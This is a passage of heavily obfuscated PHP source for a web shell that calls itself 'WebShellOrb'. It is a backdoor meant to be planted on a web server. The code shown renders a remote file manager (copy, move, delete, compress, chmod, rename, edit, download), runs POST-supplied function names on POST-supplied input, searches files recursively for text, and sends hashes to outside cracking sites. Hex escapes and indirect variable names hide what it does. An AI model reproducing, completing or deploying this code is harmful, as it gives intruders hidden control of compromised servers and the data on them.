usort(${${"\x47\x4c\x4f\x42\x41\x4cS"}["y\x6c\x75x\x65c\x6c\x6c"]}, "WebS\x68\x65\x6cl\x4fr\x62\x43\x6dp");
usort(${${"G\x4cOB\x41LS"}["\x78\x7ao\x63\x71\x72o\x65s\x74\x73p"]}, "We\x62\x53\x68el\x6c\x4f\x72\x62C\x6dp");
$fjurgbvuldau = "f\x69\x6c\x65\x73";
${${"G\x4cO\x42A\x4c\x53"}["y\x6cu\x78\x65c\x6c\x6c"]} = array_merge(${${"\x47L\x4f\x42\x41\x4c\x53"}["x\x7ao\x63\x71ro\x65\x73\x74\x73\x70"]}, ${${"\x47\x4cO\x42AL\x53"}["\x75\x72s\x6cv\x76\x65\x76\x63\x79\x64"]});
${${"\x47L\x4fBA\x4c\x53"}["ga\x79\x61\x69\x6f"]} = 0;
foreach (${$fjurgbvuldau} as ${${"\x47\x4c\x4fBA\x4c\x53"}["s\x62erlg"]}) {
$dwvibzt = "f";
$etnrnpxldmn = "\x66";
${"GLO\x42A\x4c\x53"}["c\x63f\x76\x71\x69\x68\x71\x6ail"] = "f";
${"\x47\x4c\x4fB\x41L\x53"}["\x73zf\x69\x66\x79\x66"] = "\x66";
$ftzjqt = "f";
$gnoadugbfdu = "\x66";
$djskevnnm = "\x66";
$mhjrxxhgopd = "\x66";
$lbmonmg = "f";
${"\x47\x4c\x4fBAL\x53"}["\x7a\x70\x70m\x69g\x6dv\x71hk"] = "\x66";
$kjkiswjllpu = "f";
$oxvhme = "f";
${"\x47\x4c\x4f\x42AL\x53"}["\x63p\x74\x69cd"] = "f";
${"GL\x4f\x42AL\x53"}["h\x74\x68oi\x66\x79fk\x6c"] = "\x6c";
echo "\x3c\x74r" . (${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x68t\x68o\x69f\x79f\x6bl"]} ? " c\x6c\x61\x73s\x3d\x6c1" : "") . "><\x74d><\x69npu\x74 \x74y\x70e\x3dche\x63\x6b\x62\x6f\x78 \x6ea\x6de\x3d\x22f[]\x22\x20v\x61\x6c\x75\x65\x3d\x22" . urlencode(${${"G\x4cO\x42\x41\x4c\x53"}["\x73\x62\x65\x72\x6cg"]}["\x6e\x61m\x65"]) . "\x22\x20c\x6ca\x73\x73\x3d\x63hk\x62x\x3e</t\x64\x3e\x3ct\x64\x3e\x3c\x61\x20hr\x65f=#\x20\x6fnclick=\x22" . ((${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73\x7a\x66\x69\x66y\x66"]}["type"] == "\x66\x69le") ? "\x67(\x27\x46il\x65\x73T\x6f\x6f\x6cs',n\x75\x6cl,'" . urlencode(${${"\x47L\x4fB\x41\x4cS"}["\x73b\x65\x72l\x67"]}["\x6e\x61me"]) . "',\x20\x27\x76\x69\x65\x77')\x22\x3e" . htmlspecialchars(${$lbmonmg}["name"]) : "\x67(\x27\x46iles\x4d\x61n','" . ${$etnrnpxldmn}["p\x61\x74\x68"] . "\x27);\"\x20" . (empty(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x62e\x72\x6c\x67"]}["l\x69\x6ek"]) ? "" : "title=\x27{$f['link']}'") . "\x3e<b\x3e[\x20" . htmlspecialchars(${${"G\x4cO\x42\x41L\x53"}["s\x62\x65\x72\x6cg"]}["n\x61m\x65"]) . "\x20]</\x62>") . "</\x61\x3e</t\x64\x3e\x3ctd>" . ((${${"\x47\x4c\x4fBALS"}["\x73be\x72\x6cg"]}["t\x79\x70\x65"] == "file") ? WebShellOrbViewSize(${$dwvibzt}["\x73\x69ze"]) : ${$mhjrxxhgopd}["\x74yp\x65"]) . "</td\x3e\x3ctd\x3e" . ${${"\x47\x4cOB\x41\x4c\x53"}["s\x62\x65r\x6c\x67"]}["m\x6fd\x69f\x79"] . "</\x74\x64><\x74d\x3e" . ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x7ap\x70mi\x67\x6d\x76\x71h\x6b"]}["\x6f\x77n\x65r"] . "/" . ${$djskevnnm}["\x67\x72\x6f\x75\x70"] . "\x3c/td\x3e\x3c\x74d\x3e<a\x20h\x72e\x66=\x23\x20\x6fn\x63\x6ci\x63\x6b\x3d\"g('\x46\x69les\x54oo\x6cs\x27,nu\x6c\x6c,\x27" . urlencode(${${"\x47\x4c\x4f\x42AL\x53"}["ccf\x76\x71ihq\x6ail"]}["n\x61me"]) . "\x27,\x27c\x68m\x6f\x64')\">" . ${$ftzjqt}["\x70erms"] . "</\x74\x64\x3e\x3c\x74d><\x61 h\x72\x65f\x3d\x22#\"\x20\x6fnc\x6c\x69c\x6b\x3d\"\x67('\x46i\x6ces\x54\x6f\x6f\x6cs',\x6e\x75\x6cl,'" . urlencode(${$gnoadugbfdu}["\x6e\x61me"]) . "\x27, \x27r\x65\x6ea\x6de\x27)\"\x3eR\x3c/\x61\x3e <a hr\x65\x66\x3d\x22\x23\x22\x20on\x63\x6cic\x6b=\"\x67('\x46\x69\x6ces\x54\x6f\x6fls',n\x75l\x6c,'" . urlencode(${${"\x47\x4cO\x42A\x4c\x53"}["\x73\x62\x65rlg"]}["\x6eam\x65"]) . "', \x27\x74\x6fu\x63h\x27)\"\x3e\x54\x3c/\x61\x3e" . ((${${"\x47L\x4fB\x41L\x53"}["\x63pt\x69\x63d"]}["\x74\x79pe"] == "fil\x65") ? " \x3c\x61 \x68r\x65f\x3d\x22#\x22\x20\x6fnclick=\"g(\x27Files\x54\x6f\x6fls',\x6eul\x6c,'" . urlencode(${$kjkiswjllpu}["name"]) . "', '\x65\x64it\x27)\x22>E</a> \x3c\x61 \x68r\x65f=\"#\" \x6fncl\x69\x63k\x3d\"g(\x27F\x69\x6c\x65\x73T\x6fo\x6c\x73\x27,\x6e\x75ll,\x27" . urlencode(${$oxvhme}["n\x61\x6de"]) . "\x27,\x20\x27\x64o\x77\x6el\x6fad\x27)\x22>\x44\x3c/a>" : "") . "</\x74d>\x3c/tr>";
${${"G\x4c\x4f\x42AL\x53"}["g\x61\x79\x61i\x6f"]} = ${${"\x47L\x4f\x42\x41LS"}["\x67ay\x61\x69\x6f"]} ? 0 : 1;
}
echo "\x3ct\x72><\x74d c\x6f\x6csp\x61\x6e\x3d\x37>\n\t\x3c\x69nput \x74\x79\x70\x65=\x68\x69dde\x6e\x20n\x61\x6d\x65=a\x20\x76alue=\x27\x46\x69le\x73\x4dan'>\n\t<i\x6e\x70\x75\x74\x20\x74ype=\x68id\x64\x65\x6e \x6ea\x6d\x65\x3dc value='" . htmlspecialchars($GLOBALS["c\x77\x64"]) . "\x27>\n\t\x3cin\x70\x75\x74 t\x79p\x65\x3dhidd\x65\x6e n\x61\x6de=\x63hars\x65t \x76\x61\x6cue=\x27" . (isset($_POST["\x63ha\x72s\x65\x74"]) ? $_POST["\x63\x68\x61\x72\x73\x65\x74"] : "") . "'>\n\t\x3c\x73\x65lect n\x61\x6de=\x27\x701'>\x3cop\x74i\x6f\x6e v\x61lu\x65=\x27\x63\x6f\x70\x79'\x3eCopy</o\x70\x74i\x6f\x6e>\x3coption\x20\x76al\x75e\x3d\x27mo\x76\x65'>Mo\x76\x65\x3c/\x6fp\x74\x69on\x3e<\x6fptio\x6e \x76alu\x65\x3d'\x64\x65le\x74\x65\x27>\x44e\x6c\x65\x74\x65</op\x74ion\x3e";
if (class_exists("Z\x69pArc\x68iv\x65"))
echo "<o\x70ti\x6f\x6e\x20\x76\x61l\x75e\x3d\x27zip'\x3eCom\x70r\x65s\x73 (\x7ai\x70)\x3c/o\x70ti\x6fn\x3e\x3co\x70ti\x6f\x6e\x20\x76al\x75\x65\x3d\x27\x75nzi\x70\x27 \x73e\x6ce\x63\x74e\x64>Un\x63\x6fmp\x72e\x73\x73 (u\x6ezi\x70)</\x6fp\x74\x69o\x6e>";
echo "\x3coptio\x6e val\x75\x65\x3d't\x61\x72\x27>\x43om\x70re\x73s\x20(ta\x72\x2egz)</op\x74\x69on>";
if (!empty($_COOKIE["ac\x74"]) && @count($_COOKIE["\x66"]))
echo "\x3c\x6f\x70ti\x6fn\x20va\x6cu\x65='\x70as\x74e'\x3e\x50a\x73\x74\x65 /\x20\x43ompr\x65s\x73\x3c/op\x74io\x6e>";
echo "</s\x65lec\x74>\x26\x6ebsp;";
if (!empty($_COOKIE["a\x63t"]) && @count($_COOKIE["\x66"]) && (($_COOKIE["a\x63\x74"] == "zip") || ($_COOKIE["ac\x74"] == "t\x61\x72")))
echo "\x66\x69l\x65\x20n\x61m\x65:\x20<\x69n\x70ut \x74\x79\x70e=\x74ext n\x61me=\x702\x20va\x6c\x75e\x3d'W\x65\x62\x53\x68ellOrb\x5f" . date("Y\x6d\x64\x5fH\x69s") . "\x2e" . ($_COOKIE["\x61\x63t"] == "z\x69\x70" ? "\x7aip" : "\x74\x61\x72\x2eg\x7a") . "'>&n\x62\x73p\x3b";
echo "\x3cin\x70\x75t\x20\x74y\x70e='\x73\x75\x62mit' va\x6cu\x65\x3d\x27>>\x27\x3e</\x74\x64\x3e</\x74r\x3e</\x66o\x72m\x3e</\x74able\x3e\x3c/\x64i\x76>";
WebShellOrbFooter();
}
function actionStringTools()
{
if (!function_exists("h\x65\x782bi\x6e")) {
function hex2bin($p)
{
return decbin(hexdec(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x76\x77hn\x6d\x76\x62zm\x75q\x64"]}));
}
}
if (!function_exists("\x62\x69\x6eh\x65\x78")) {
function binhex($p)
{
return dechex(bindec(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x76\x77\x68\x6em\x76\x62z\x6d\x75\x71d"]}));
}
}
if (!function_exists("hex\x32\x61\x73\x63i\x69")) {
function hex2ascii($p)
{
$uypcormetl = "r";
${"\x47LO\x42A\x4c\x53"}["\x6f\x78\x68k\x65ml\x70"] = "i";
${"GL\x4fB\x41\x4c\x53"}["v\x66\x68\x79\x71q\x62k\x64\x70"] = "i";
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x63\x66\x73\x62a\x74\x7a\x70"] = "\x72";
${$uypcormetl} = "";
$wfjslxaohfdq = "\x69";
for (${${"G\x4c\x4f\x42A\x4c\x53"}["\x76\x66\x68\x79qq\x62k\x64p"]} = 0; ${${"GLO\x42\x41LS"}["o\x78h\x6b\x65\x6dl\x70"]} < strLen(${${"\x47L\x4f\x42\x41LS"}["\x76\x77h\x6e\x6d\x76\x62\x7a\x6d\x75qd"]}); ${$wfjslxaohfdq} += 2) {
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6a\x79u\x6f\x6f\x6fq\x6e"] = "\x69";
${${"\x47LOBAL\x53"}["\x6dw\x70oytm\x77\x75s"]} .= chr(hexdec(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["v\x77\x68nm\x76\x62\x7a\x6d\x75\x71\x64"]}[${${"\x47LO\x42\x41\x4c\x53"}["\x6a\x79u\x6f\x6f\x6f\x71n"]}] . ${${"G\x4c\x4f\x42\x41\x4cS"}["\x76wh\x6e\x6d\x76\x62\x7a\x6du\x71\x64"]}[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["c\x6c\x6b\x75\x79ojj"]} + 1]));
}
return ${${"\x47\x4cO\x42\x41LS"}["\x63\x66s\x62atzp"]};
}
}
if (!function_exists("as\x63i\x692\x68e\x78")) {
function ascii2hex($p)
{
${"\x47\x4c\x4f\x42A\x4c\x53"}["urk\x76p\x67"] = "i";
${"\x47\x4c\x4f\x42\x41\x4cS"}["\x76\x62\x68dc\x71x\x67\x6d\x6e"] = "\x72";
${"\x47\x4c\x4f\x42A\x4c\x53"}["i\x77\x63\x73\x73n\x78\x74\x68c"] = "\x72";
$ottwxohxvz = "i";
$egrmdhvku = "\x69";
${"\x47LO\x42A\x4cS"}["p\x71\x72\x6a\x6en\x69"] = "\x69";
${${"G\x4cO\x42\x41\x4c\x53"}["v\x62h\x64\x63q\x78\x67\x6dn"]} = "";
for (${${"\x47\x4c\x4fBA\x4cS"}["u\x72\x6b\x76p\x67"]} = 0; ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["pq\x72j\x6e\x6e\x69"]} < strlen(${${"\x47\x4cO\x42\x41LS"}["v\x77\x68\x6e\x6d\x76bzm\x75\x71d"]}); ++${$ottwxohxvz})
${${"\x47\x4c\x4fB\x41L\x53"}["\x6dw\x70oy\x74\x6d\x77us"]} .= sprintf("%0\x32X", ord(${${"G\x4cO\x42\x41\x4c\x53"}["\x76\x77\x68n\x6d\x76b\x7a\x6d\x75\x71\x64"]}[${$egrmdhvku}]));
return strtoupper(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x69\x77\x63\x73\x73\x6ex\x74hc"]});
}
}
$yiuajyicz = "k";
if (!function_exists("\x66\x75ll\x5f\x75\x72l\x65nco\x64\x65")) {
function full_urlencode($p)
{
${"G\x4cOB\x41\x4cS"}["\x72\x65\x72\x67n\x75\x72\x71\x79"] = "\x69";
$fgbwesun = "\x69";
${"\x47\x4c\x4fB\x41\x4cS"}["v\x6aj\x79\x62n\x68\x6f\x6f\x67\x73"] = "\x72";
${"\x47L\x4f\x42\x41L\x53"}["kx\x63\x66h\x68\x73\x6e\x74"] = "\x70";
${"\x47L\x4f\x42A\x4cS"}["mt\x6c\x76\x6en\x77"] = "i";
${${"\x47\x4c\x4fBAL\x53"}["\x76j\x6a\x79bn\x68o\x6f\x67\x73"]} = "";
$vubqmofppqp = "p";
for (${${"GLO\x42\x41LS"}["mt\x6c\x76n\x6e\x77"]} = 0; ${${"\x47\x4cOB\x41\x4cS"}["\x72e\x72\x67\x6e\x75\x72\x71\x79"]} < strlen(${${"G\x4c\x4f\x42A\x4c\x53"}["\x6bx\x63f\x68\x68s\x6e\x74"]}); ++${${"GL\x4f\x42AL\x53"}["\x63\x6c\x6b\x75y\x6fj\x6a"]})
${${"\x47\x4cOB\x41\x4cS"}["\x6dw\x70o\x79t\x6d\x77\x75\x73"]} .= "%" . dechex(ord(${$vubqmofppqp}[${$fgbwesun}]));
return strtoupper(${${"\x47\x4c\x4f\x42A\x4cS"}["\x6d\x77p\x6fy\x74\x6dwu\x73"]});
}
}
${${"G\x4c\x4fB\x41\x4c\x53"}["\x64\x79\x76\x74\x68\x65\x74"]} = array(
"\x42\x61\x73\x6564 \x65n\x63ode" => "b\x61\x73e\x36\x34_\x65n\x63\x6f\x64\x65",
"Ba\x73e64 d\x65\x63\x6f\x64e" => "bas\x6564_\x64\x65\x63\x6f\x64\x65",
"\x55\x72\x6c en\x63\x6fd\x65" => "\x75rl\x65n\x63\x6f\x64\x65",
"U\x72\x6c \x64e\x63\x6fde" => "\x75rl\x64e\x63o\x64e",
"\x46\x75ll\x20url\x65nc\x6fd\x65" => "\x66u\x6c\x6c_\x75\x72le\x6ec\x6fd\x65",
"\x6dd5\x20\x68\x61\x73h" => "md\x35",
"s\x68\x611\x20h\x61s\x68" => "\x73h\x61\x31",
"cr\x79p\x74" => "c\x72ypt",
"\x43RC\x33\x32" => "\x63r\x633\x32",
"AS\x43\x49I\x20to\x20HEX" => "\x61\x73\x63i\x692\x68e\x78",
"HE\x58\x20\x74o \x41\x53C\x49\x49" => "\x68ex\x32asci\x69",
"HE\x58\x20\x74o DE\x43" => "\x68ex\x64\x65\x63",
"HEX\x20to\x20BI\x4e" => "he\x78\x32\x62\x69n",
"DEC\x20to HE\x58" => "\x64e\x63he\x78",
"D\x45C\x20\x74o B\x49N" => "\x64\x65\x63\x62\x69n",
"B\x49N to\x20\x48EX" => "\x62\x69nh\x65x",
"\x42IN\x20\x74\x6f D\x45C" => "bin\x64e\x63",
"\x53\x74r\x69n\x67 \x74o\x20l\x6fw\x65r\x20c\x61\x73e" => "\x73\x74r\x74o\x6c\x6fw\x65\x72",
"Strin\x67\x20to\x20upper\x20\x63ase" => "\x73t\x72tou\x70per",
"H\x74m\x6cs\x70ecial\x63h\x61r\x73" => "html\x73\x70\x65ci\x61lch\x61\x72\x73",
"S\x74\x72i\x6eg\x20l\x65\x6egt\x68" => "\x73trl\x65\x6e"
);
if (isset($_POST["\x61\x6a\x61x"])) {
WebShellOrbsetcookie(md5($_SERVER["HT\x54P\x5fH\x4f\x53\x54"]) . "a\x6aax", true);
${"G\x4cOB\x41\x4c\x53"}["\x6b\x73\x6fvo\x76\x68o\x62y"] = "\x74\x65\x6d\x70";
ob_start();
if (in_array($_POST["p1"], ${${"\x47L\x4f\x42ALS"}["\x64\x79\x76t\x68et"]}))
echo $_POST["\x70\x31"]($_POST["p\x32"]);
${${"G\x4cO\x42A\x4c\x53"}["k\x73\x6fvov\x68\x6f\x62\x79"]} = "doc\x75m\x65n\x74\x2e\x67\x65\x74E\x6ce\x6den\x74B\x79\x49d(\x27st\x72\x4fu\x74p\x75t\x27)\x2e\x73t\x79l\x65.\x64\x69spla\x79=\x27\x27\x3b\x64\x6f\x63u\x6d\x65nt\x2ege\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64('s\x74\x72Ou\x74\x70u\x74')\x2ei\x6ene\x72H\x54M\x4c=\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\\x27\0") . "'\x3b\n";
echo strlen(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x65\x72\x63\x67\x6d\x64\x77\x65"]}), "\n", ${${"G\x4cO\x42\x41\x4cS"}["\x6d\x65r\x63\x67m\x64w\x65"]};
exit;
}
if (empty($_POST["\x61j\x61\x78"]) && !empty($_POST["p1"]))
WebShellOrbsetcookie(md5($_SERVER["\x48\x54TP_HOS\x54"]) . "aj\x61x", 0);
WebShellOrbHeader();
echo "<h1\x3eStri\x6eg \x63on\x76\x65\x72s\x69\x6fns\x3c/h1\x3e<\x64iv\x20cl\x61\x73s\x3dc\x6f\x6et\x65nt\x3e";
echo "<form \x6e\x61me\x3d'to\x6fl\x73Form'\x20on\x53\x75bmi\x74=\x27\x69f(\x74\x68\x69\x73\x2e\x61j\x61\x78\x2e\x63\x68\x65c\x6be\x64){\x61(\x6eul\x6c,\x6eu\x6cl,\x74\x68\x69s\x2es\x65\x6c\x65\x63\x74\x54o\x6fl.\x76\x61\x6c\x75e,th\x69s.\x69\x6e\x70\x75\x74\x2eval\x75\x65);}\x65lse{g(n\x75l\x6c,\x6eul\x6c,\x74\x68\x69\x73\x2es\x65\x6ce\x63t\x54oo\x6c\x2e\x76\x61\x6cue,\x74\x68\x69\x73\x2e\x69np\x75t.v\x61l\x75\x65)\x3b} r\x65\x74\x75\x72\x6e\x20f\x61\x6c\x73\x65;'><s\x65le\x63\x74 nam\x65='s\x65l\x65ct\x54oo\x6c\x27>";
foreach (${${"\x47\x4c\x4f\x42\x41L\x53"}["\x64yv\x74\x68\x65\x74"]} as ${$yiuajyicz} => ${${"GL\x4fB\x41L\x53"}["\x76v\x64\x78mj\x62\x67\x65c"]})
echo "<\x6fp\x74\x69\x6fn\x20v\x61l\x75\x65='" . htmlspecialchars(${${"GLOB\x41L\x53"}["v\x76d\x78\x6d\x6a\x62g\x65c"]}) . "\x27>" . ${${"G\x4c\x4fB\x41LS"}["\x6fq\x76r\x79\x78\x65"]} . "</op\x74io\x6e>";
echo "</s\x65\x6c\x65ct\x3e\x3c\x69n\x70u\x74\x20\x74ype\x3d's\x75bmit' \x76\x61lu\x65='\x3e>\x27/>\x20<\x69\x6e\x70\x75t\x20\x74\x79\x70e\x3d\x63\x68\x65\x63\x6b\x62\x6f\x78\x20\x6e\x61\x6d\x65=ajax\x20va\x6cue\x3d1 " . (@$_COOKIE[md5($_SERVER["\x48TT\x50_HOS\x54"]) . "\x61ja\x78"] ? "\x63\x68e\x63k\x65\x64" : "") . ">\x20\x73e\x6ed\x20\x75s\x69\x6e\x67 AJ\x41\x58\x3cb\x72>\x3c\x74e\x78tar\x65a\x20name=\x27\x69n\x70ut\x27\x20\x73tyle\x3d\x27\x6d\x61\x72\x67i\x6e-\x74op:\x35\x70x'\x20c\x6ca\x73s=b\x69\x67ar\x65\x61>" . (empty($_POST["\x701"]) ? "" : htmlspecialchars(@$_POST["p\x32"])) . "\x3c/\x74\x65\x78\x74\x61\x72\x65\x61>\x3c/form><\x70re\x20c\x6ca\x73\x73=\x27m\x6c1\x27 st\x79\x6ce='" . (empty($_POST["p\x31"]) ? "\x64\x69spla\x79:\x6e\x6f\x6ee\x3b" : "") . "\x6d\x61rgi\x6e-t\x6f\x70:\x35px' i\x64\x3d'\x73\x74r\x4f\x75t\x70u\x74'>";
if (!empty($_POST["\x70\x31"])) {
${"\x47\x4cO\x42\x41\x4c\x53"}["\x69o\x74\x71\x72\x62rxn\x64\x78"] = "\x73\x74r\x69\x6e\x67\x54\x6f\x6f\x6cs";
if (in_array($_POST["\x701"], ${${"\x47\x4c\x4f\x42ALS"}["\x69ot\x71\x72b\x72\x78\x6e\x64x"]}))
echo htmlspecialchars($_POST["\x701"]($_POST["p2"]));
}
echo "\x3c/p\x72e\x3e</\x64i\x76>\x3cbr>\x3ch\x31>\x53\x65a\x72ch \x66\x69\x6ce\x73:\x3c/h1\x3e\x3c\x64i\x76\x20\x63l\x61ss\x3dconte\x6e\x74>\n\t\t\x3cf\x6fr\x6d ons\x75\x62\x6d\x69\x74\x3d\"g(\x6e\x75l\x6c,\x74\x68i\x73\x2e\x63w\x64.\x76\x61l\x75e,n\x75\x6c\x6c,t\x68is.\x74\x65x\x74\x2eva\x6c\x75\x65,\x74\x68i\x73\x2e\x66\x69\x6ce\x6e\x61\x6de.va\x6cue)\x3bretur\x6e f\x61\x6cs\x65\x3b\x22><\x74a\x62le\x20\x63ellpa\x64d\x69\x6eg=\x27\x31\x27 \x63e\x6cl\x73paci\x6e\x67\x3d\x270'\x20\x77idth\x3d'\x350%'>\n\t\t\t\x3c\x74r\x3e<t\x64 w\x69\x64\x74h='1\x25'>Te\x78t:\x3c/\x74d>\x3c\x74d>\x3ci\x6eput ty\x70\x65\x3d\x27tex\x74' \x6e\x61\x6de\x3d\x27\x74e\x78t'\x20s\x74y\x6ce\x3d'\x77id\x74\x68:1\x30\x30\x25'>\x3c/\x74d></\x74\x72>\n\t\t\t<\x74r><\x74d\x3e\x50at\x68:\x3c/t\x64><\x74d\x3e<\x69n\x70ut \x74ype=\x27t\x65x\x74\x27 \x6ea\x6d\x65\x3d'c\x77\x64\x27\x20v\x61\x6cu\x65\x3d'" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\x27\x20\x73t\x79l\x65='wi\x64\x74\x68:\x3100%\x27>\x3c/\x74d>\x3c/t\x72\x3e\n\t\t\t<tr>\x3c\x74\x64\x3eN\x61m\x65:\x3c/\x74\x64\x3e<t\x64>\x3ci\x6e\x70\x75t\x20ty\x70\x65='te\x78\x74\x27 nam\x65=\x27fi\x6c\x65n\x61m\x65'\x20\x76\x61\x6cue=\x27*\x27 \x73\x74y\x6c\x65\x3d\x27\x77id\x74\x68:\x31\x30\x30%\x27\x3e\x3c/td\x3e</t\x72>\n\t\t\t\x3c\x74\x72><t\x64></t\x64><\x74\x64><i\x6e\x70ut t\x79p\x65='\x73\x75\x62\x6dit\x27\x20v\x61\x6cue=\x27>>\x27>\x3c/\x74d\x3e</\x74r>\n\t\t\t\x3c/\x74a\x62\x6ce>\x3c/fo\x72\x6d\x3e";
function WebShellOrbRecursiveGlob($path)
{
$nwlnoptyz = "\x70\x61t\x68";
${"G\x4cO\x42\x41L\x53"}["\x68\x67\x6f\x67\x6ark\x7a\x70\x71\x68\x67"] = "pa\x74\x68";
$tucxriw = "\x70a\x74\x68";
$wdohupkfrto = "\x70\x61ths";
$ethxrtpluwhs = "p\x61t\x68\x73";
if (substr(${${"\x47\x4cOB\x41\x4c\x53"}["\x66\x66sw\x6c\x68ab"]}, -1) != "/")
${$tucxriw} .= "/";
${$wdohupkfrto} = @array_unique(@array_merge(@glob(${${"G\x4cO\x42\x41\x4cS"}["\x68g\x6fg\x6a\x72k\x7apq\x68g"]} . $_POST["p\x33"]), @glob(${$nwlnoptyz} . "*", GLOB_ONLYDIR)));
if (is_array(${${"\x47LO\x42A\x4cS"}["\x67ig\x73mq\x79ow\x62"]}) && @count(${$ethxrtpluwhs})) {
${"\x47\x4c\x4fBA\x4cS"}["\x75\x70\x69\x63r\x65\x71k\x61\x64"] = "\x70\x61\x74\x68\x73";
foreach (${${"G\x4cO\x42\x41\x4c\x53"}["u\x70\x69\x63r\x65\x71k\x61\x64"]} as ${${"\x47\x4c\x4f\x42AL\x53"}["\x62\x64mq\x77q\x76f\x71n"]}) {
$qbvtxmhfia = "i\x74em";
if (@is_dir(${$qbvtxmhfia})) {
${"G\x4c\x4f\x42\x41\x4c\x53"}["c\x65\x77\x69i\x74\x76"] = "\x69t\x65\x6d";
if (${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x66\x66\x73\x77\x6c\x68a\x62"]} != ${${"G\x4cOBAL\x53"}["c\x65wi\x69\x74\x76"]})
WebShellOrbRecursiveGlob(${${"\x47\x4c\x4f\x42\x41\x4cS"}["bd\x6dq\x77\x71\x76\x66q\x6e"]});
} else {
${"\x47\x4c\x4fB\x41\x4cS"}["\x6c\x78dqqw"] = "i\x74e\x6d";
if (empty($_POST["p\x32"]) || @strpos(file_get_contents(${${"GL\x4fB\x41\x4cS"}["\x6cx\x64\x71\x71\x77"]}), $_POST["\x702"]) !== false)
echo "\x3c\x61 \x68\x72ef=\x27\x23' \x6f\x6ecl\x69ck\x3d'\x67(\"\x46il\x65s\x54o\x6f\x6cs\",n\x75\x6cl,\"" . urlencode(${${"GL\x4f\x42\x41\x4c\x53"}["\x62\x64\x6d\x71wq\x76\x66q\x6e"]}) . "\",\x20\x22v\x69e\x77\x22,\x22\x22)'\x3e" . htmlspecialchars(${${"\x47\x4cO\x42\x41\x4cS"}["bdm\x71\x77\x71v\x66q\x6e"]}) . "\x3c/a\x3e<br>";
}
}
}
}
if (@$_POST["\x70\x33"])
WebShellOrbRecursiveGlob($_POST["c"]);
echo "</\x64\x69\x76\x3e<b\x72><h\x31>\x53\x65\x61\x72\x63\x68 \x66or\x20\x68ash:\x3c/h\x31\x3e<div\x20\x63\x6ca\x73s=co\x6ete\x6et>\n\t\t\x3cf\x6f\x72\x6d \x6de\x74hod=\x27\x70\x6f\x73t'\x20\x74ar\x67\x65\x74\x3d\x27_blank'\x20name\x3d\x27hf\x27\x3e\n\t\t\t\x3cinpu\x74\x20\x74\x79pe='\x74\x65xt\x27\x20n\x61me=\x27ha\x73h\x27\x20st\x79\x6c\x65=\x27w\x69\x64\x74h:\x32\x300\x70\x78\x3b\x27\x3e<b\x72\x3e\n \x20\x20 \x20\x20\x20 <\x69\x6e\x70\x75\x74\x20ty\x70\x65\x3d'hi\x64\x64en'\x20\x6e\x61\x6d\x65='\x61\x63\x74\x27\x20\x76\x61l\x75\x65='f\x69\x6ed'/>\n\t\t\t\x3ci\x6e\x70\x75\x74 ty\x70e=\x27\x62utto\x6e\x27\x20val\x75\x65\x3d'\x68\x61\x73h\x63\x72ac\x6bing.\x72u'\x20\x6fn\x63\x6c\x69\x63\x6b=\"\x64ocume\x6e\x74.hf\x2ea\x63ti\x6fn\x3d'\x68\x74\x74p\x73://h\x61\x73\x68\x63\x72acking\x2eru/\x69\x6ed\x65x.php\x27;\x64\x6f\x63ume\x6e\x74\x2e\x68\x66.\x73\x75\x62\x6di\x74()\x22\x3e<b\x72>\n\t\t\t\x3c\x69\x6epu\x74\x20t\x79pe=\x27b\x75tto\x6e\x27 v\x61\x6cu\x65=\x27\x6dd5.\x72\x65d\x6e\x6fi\x7ae.\x63om\x27\x20\x6fncl\x69\x63\x6b\x3d\x22\x64\x6f\x63ume\x6et.\x68\x66.a\x63\x74io\x6e=\x27h\x74tp://\x6dd\x35.r\x65d\x6eoi\x7a\x65.\x63\x6fm/?q='+doc\x75ment.\x68f.h\x61sh\x2ev\x61l\x75\x65+'\x26s=\x6dd5';\x64o\x63\x75me\x6et.h\x66\x2e\x73\x75\x62mi\x74()\">\x3c\x62r>\n \x20 \x20 \x20\x3ci\x6e\x70ut t\x79\x70e\x3d\x27bu\x74t\x6fn' \x76\x61\x6cue\x3d'crac\x6b\x66\x6fr\x2e\x6de'\x20\x6fn\x63li\x63k=\x22d\x6f\x63\x75m\x65nt.hf\x2e\x61c\x74i\x6fn\x3d\x27\x68\x74t\x70://\x63\x72ac\x6bf\x6fr.\x6d\x65/\x69nd\x65x.ph\x70';\x64\x6fc\x75m\x65\x6e\x74\x2e\x68f\x2e\x73u\x62m\x69\x74()\">\x3cbr>\n\t\t\x3c/\x66or\x6d\x3e\x3c/d\x69v\x3e";
WebShellOrbFooter();
}
function actionFilesTools()
{
${"\x47\x4c\x4f\x42AL\x53"}["\x63\x79\x65\x65\x64\x69\x6d\x64\x6bb\x6d"] = "\x75id";
$sfgrxg = "v";
${"\x47\x4cO\x42ALS"}["w\x66\x61lb\x6d\x77"] = "\x6d";
if (isset($_POST["p\x31"]))
$_POST["p\x31"] = urldecode($_POST["p\x31"]);
${"\x47\x4c\x4f\x42A\x4c\x53"}["yh\x6fc\x65\x65"] = "\x69";
$ixhzma = "\x6c\x65\x6e";
${"\x47L\x4f\x42\x41L\x53"}["\x6d\x73l\x73\x68ih\x69"] = "v";
if (@$_POST["\x70\x32"] == "do\x77nl\x6fad") {
if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) {
ob_start("o\x62\x5f\x67zha\x6ed\x6ce\x72", 4096);
header("Con\x74\x65\x6e\x74-\x44i\x73p\x6fsi\x74ion: \x61tt\x61ch\x6d\x65\x6et\x3b\x20fil\x65na\x6d\x65=" . basename($_POST["\x701"]));
if (function_exists("mi\x6de\x5f\x63\x6fnten\x74_\x74\x79\x70\x65")) {
